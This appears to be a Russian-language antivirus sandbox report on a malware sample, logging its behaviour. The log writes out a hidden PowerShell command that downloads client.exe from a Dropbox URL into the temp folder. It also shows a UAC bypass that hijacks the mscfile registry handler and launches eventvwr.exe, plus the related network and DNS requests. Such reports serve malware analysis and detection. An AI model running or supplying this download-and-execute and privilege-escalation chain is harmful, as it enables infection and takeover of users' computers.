Техническая информация
- https://dl.dropboxusercontent.com/content_link/4ah7cb3hkdjh0aurstjhytreenp3qwcmjj9hbyvfbsvn5jkmzgh8xwctjbc2l36a/filedl=1 как %temp%\\client.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://dl.dropboxusercontent.com/content_link/4AH7Cb3hkdJH0aUrStjHyTreenP3QwCmjj9hBYVFBsvN5JKmZGh8xw...
- nul
- 'dl.#####oxusercontent.com':443
- 'dl.#####oxusercontent.com':443
- DNS ASK dl.#####oxusercontent.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://dl.dropboxusercontent.com/content_link/4AH7Cb3hkdJH0aUrStjHyTreenP3QwCmjj9hBYVFBsvN5JKmZGh8xw...' (со скрытым окном)
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\client.exe /f
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"
- '<SYSTEM32>\ping.exe' -n 15 127.0.0.1